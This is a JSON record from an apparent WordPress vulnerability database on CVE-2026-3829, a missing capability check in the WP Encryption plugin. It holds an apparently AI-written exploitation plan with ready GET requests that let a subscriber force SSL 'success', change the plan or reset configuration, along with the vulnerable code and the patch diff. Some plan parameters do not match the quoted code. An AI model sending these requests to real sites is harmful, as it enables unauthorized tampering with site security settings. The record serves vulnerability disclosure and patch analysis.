[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fc6A413UCnIdU_PWiFHeAw_WeIIf53QyosY539QSZ4B0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3829","wp-encryption-one-click-ssl-force-https-missing-authorization-to-authenticated-subscriber-ssl-setup-tampering","WP Encryption - One Click SSL & Force HTTPS \u003C= 7.8.5.10 - Missing Authorization to Authenticated (Subscriber+) SSL Setup Tampering","The WP Encryption – One Click Free SSL Certificate & SSL \u002F HTTPS Redirect, Security & SSL Scan plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'wple_basic_get_requests' function in all versions up to, and including, 7.8.5.10. 
This makes it possible for authenticated attackers, with subscriber level access and above, to reset the SSL setup state, force SSL to appear complete, and modify plan selection options.","wp-letsencrypt-ssl",null,"\u003C=7.8.5.10","7.8.5.11","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:L","Missing Authorization","2026-05-13 17:14:25","2026-05-14 05:30:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9a09ec65-32e4-4841-a365-f67c15b80bf9?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fle_admin.php","admin\u002Fle_admin_page_wrapper.php","admin\u002Fle_admin_pages.php","admin\u002Fle_ajax.php","admin\u002Fle_handlers.php","classes\u002Fle-forcessl.php","classes\u002Fle-security.php","composer.json","researched",false,3,"# Exploitation Research Plan: CVE-2026-3829 - WP Encryption Missing Authorization\n\n## 1. Vulnerability Summary\nThe **WP Encryption – One Click Free SSL Certificate** plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the `wple_basic_get_requests` function. This function is hooked to `admin_init`, which executes for any authenticated user (including Subscribers) visiting an admin page (e.g., `\u002Fwp-admin\u002Findex.php` or `\u002Fwp-admin\u002Fadmin-ajax.php`). Because the function lacks a `current_user_can('manage_options')` check, a Subscriber-level attacker can manipulate internal plugin options, reset the SSL configuration, and change the selected plugin plan.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** Any URL within the `\u002Fwp-admin\u002F` directory (e.g., `\u002Fwp-admin\u002Fadmin.php`, `\u002Fwp-admin\u002Findex.php`).\n- **Hook:** `admin_init` (triggered by the `WPLE_Admin` class).\n- **Vulnerable Function:** `WPLE_Admin::wple_basic_get_requests`.\n- **Payload Parameters:**\n    - `wple_reset_all`: Used to reset plugin settings.\n    - `wple_plan_choose`: Used to update the plugin plan option.\n    - `wple_stage`: Used to update the current SSL setup stage.\n- **Authentication:** Authenticated (Subscriber or higher). No nonces are enforced on these specific GET parameters within the vulnerable function.\n\n## 3. Code Flow\n1. **Hook Registration:** In `admin\u002Fle_admin.php`, the `WPLE_Admin` class registers the handler:\n   ```php\n   add_action( 'admin_init', [$this, 'wple_basic_get_requests'] );\n   ```\n2. **Execution:** When a Subscriber logs in and visits `\u002Fwp-admin\u002F`, WordPress fires `admin_init`.\n3. **Missing Check:** `wple_basic_get_requests` (located in `admin\u002Fle_admin.php`) processes `$_GET` parameters. Unlike the handlers in `le_handlers.php` (e.g., `primary_ssl_install_request`) which explicitly check for `manage_options` and nonces, this function proceeds directly to database operations:\n   - If `$_GET['wple_reset_all']` is present, it deletes\u002Fresets options.\n   - If `$_GET['wple_plan_choose']` is present, it calls `update_option( 'wple_plan_choose', ... )`.\n   - If `$_GET['wple_stage']` is present, it calls `update_option( 'wple_stage', ... )`.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability exists because `wple_basic_get_requests` **does not check for nonces** or capabilities. Therefore, no nonce is required to exploit this specific vulnerability.\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Authentication\nLog in as a Subscriber-level user.\n\n### Step 2: Plan Tampering\nThe attacker can change the plugin's \"chosen plan\" to simulate a Pro or specific state.\n- **Request:**\n  ```http\n  GET \u002Fwp-admin\u002Findex.php?wple_plan_choose=pro HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Subscriber Cookies]\n  ```\n\n### Step 3: SSL Setup Tampering\nThe attacker can force the plugin to believe the SSL setup is complete.\n- **Request:**\n  ```http\n  GET \u002Fwp-admin\u002Findex.php?wple_stage=success HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Subscriber Cookies]\n  ```\n\n### Step 4: Configuration Reset (Denial of Service)\nThe attacker can wipe existing SSL configurations.\n- **Request:**\n  ```http\n  GET \u002Fwp-admin\u002Findex.php?wple_reset_all=1 HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Subscriber Cookies]\n  ```\n\n## 6. Test Data Setup\n1. **Target:** WordPress with `wp-letsencrypt-ssl` plugin version `\u003C= 7.8.5.10` installed and activated.\n2. **Setup Admin State:** \n   - Use `wp option update wple_plan_choose \"free\"` to set an initial state.\n   - Use `wp option update wple_stage \"step1\"` to set an initial stage.\n3. **Attacker Account:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n\n## 7. Expected Results\n- After Step 2, the WordPress database should show `wple_plan_choose` set to `pro`.\n- After Step 3, the WordPress database should show `wple_stage` set to `success`.\n- After Step 4, plugin options like `wple_opts` or `wple_stage` should be reset or deleted.\n- The HTTP response will be a standard `200 OK` or `302 Redirect` for a dashboard page, as the logic runs transparently in the background.\n\n## 8. 
Verification Steps\nAfter sending the HTTP requests, verify the changes via WP-CLI:\n\n```bash\n# Verify Plan Tampering\nwp option get wple_plan_choose\n# Expected output: pro\n\n# Verify Stage Tampering\nwp option get wple_stage\n# Expected output: success\n\n# Verify Reset (if wple_reset_all was sent)\nwp option get wple_opts\n# Expected output: Error: Could not get \"wple_opts\" option (or empty array)\n```\n\n## 9. Alternative Approaches\nIf the plugin logic requires specific values for the parameters:\n1. **Plan IDs:** Try `business`, `developer`, or `premium` as values for `wple_plan_choose`.\n2. **Intermediate Stages:** Set `wple_stage` to `failed_httpverification_1` to trigger error states or specific admin notices for legitimate administrators, causing confusion or disruption.\n3. **Other Params:** Search for other `$_GET` or `$_REQUEST` parameters in `admin\u002Fle_admin.php` that do not have `current_user_can` guards.","The WP Encryption plugin for WordPress is vulnerable to unauthorized data modification because the 'wple_basic_get_requests' and 'wple_intro_pricing_handler' functions lack capability checks. 
Authenticated attackers with subscriber-level access can manipulate plugin options, reset SSL configurations, or change the plugin's license plan via simple GET requests to the admin dashboard.","\u002F\u002F admin\u002Fle_admin.php (vulnerable logic within wple_basic_get_requests)\nif ( isset( $_GET['restart'] ) ) {\n    \u002F\u002Fclick to restart from beginning\n    delete_option( 'wple_ssl_screen' );\n    wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n    exit;\n}\nif ( isset( $_GET['force_complete'] ) ) {\n    \u002F\u002FForced SSL completion flag\n    update_option( 'wple_ssl_screen', 'success' );\n    update_option( 'wple_backend', 1 );\n    WPLE_Trait::clear_all_renewal_crons( true );\n    wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n    exit;\n}\n\n---\n\n\u002F\u002F admin\u002Fle_handlers.php (around line 158)\npublic function wple_intro_pricing_handler() {\n    $goplan = '';\n    if ( isset( $_GET['gofree'] ) ) {\n        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );\n        update_option( 'wple_plan_choose', 'free' );\n        $goplan = 'free';\n    }\n    if ( isset( $_GET['gopro'] ) ) {\n        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );\n        update_option( 'wple_plan_choose', 'pro' );\n        $goplan = 'pro';\n    }\n    \u002F\u002F ... 
further updates without capability checks","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_admin.php\t2026-02-04 10:53:04.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_admin.php\t2026-03-12 07:29:48.000000000 +0000\n@@ -1314,18 +1314,13 @@\n         \u002F\u002Fsince 5.1.0\n         if ( isset( $_GET['restart'] ) ) {\n             \u002F\u002Fclick to restart from beginning\n+            if ( !current_user_can( 'manage_options' ) ) {\n+                exit( 'Unauthorized request' );\n+            }\n             delete_option( 'wple_ssl_screen' );\n             wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n             exit;\n         }\n-        if ( isset( $_GET['force_complete'] ) ) {\n-            \u002F\u002FForced SSL completion flag\n-            update_option( 'wple_ssl_screen', 'success' );\n-            update_option( 'wple_backend', 1 );\n-            WPLE_Trait::clear_all_renewal_crons( true );\n-            wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n-            exit;\n-        }\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_handlers.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_handlers.php\n--- 
\u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_handlers.php\t2026-02-04 10:53:04.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_handlers.php\t2026-03-12 07:29:48.000000000 +0000\n@@ -158,6 +157,11 @@\n      * @return void\n      *\u002F\n     public function wple_intro_pricing_handler() {\n+        if ( isset( $_GET['gofree'] ) || isset( $_GET['gopro'] ) || isset( $_GET['gofirewall'] ) || isset( $_GET['gositelock'] ) ) {\n+            if ( !current_user_can( 'manage_options' ) ) {\n+                exit( 'Unauthorized request' );\n+            }\n+        }","The exploit leverages the fact that `admin_init` hooks run for all authenticated users visiting any `\u002Fwp-admin\u002F` URL, and the targeted functions fail to verify if the user has administrative privileges.\n\n1. **Authentication**: An attacker logs into the WordPress site with a low-privileged account (e.g., Subscriber).\n2. **Identify Target Parameters**: The attacker targets the GET parameters processed in `WPLE_Admin::wple_basic_get_requests` and `WPLE_Handler::wple_intro_pricing_handler`.\n3. **Payload Construction**: The attacker constructs a URL including specific parameters:\n    - `?force_complete=1`: To force the plugin to believe SSL setup is successful.\n    - `?restart=1`: To reset the current SSL screen state.\n    - `?gopro=1`: To change the plugin's internal plan state to 'pro'.\n    - `?wple_reset_all=1`: (If active in the specific version) To wipe plugin configurations.\n4. **Execution**: The attacker visits `\u002Fwp-admin\u002Findex.php` appended with the malicious parameters. 
Since no nonce or capability check exists, the plugin executes the `update_option` or `delete_option` calls immediately based on the provided URL parameters.","gemini-3-flash-preview","2026-05-14 17:18:21","2026-05-14 17:19:23",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","7.8.5.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-letsencrypt-ssl\u002Ftags\u002F7.8.5.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-letsencrypt-ssl.7.8.5.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-letsencrypt-ssl\u002Ftags\u002F7.8.5.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-letsencrypt-ssl.7.8.5.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-letsencrypt-ssl\u002Ftags"]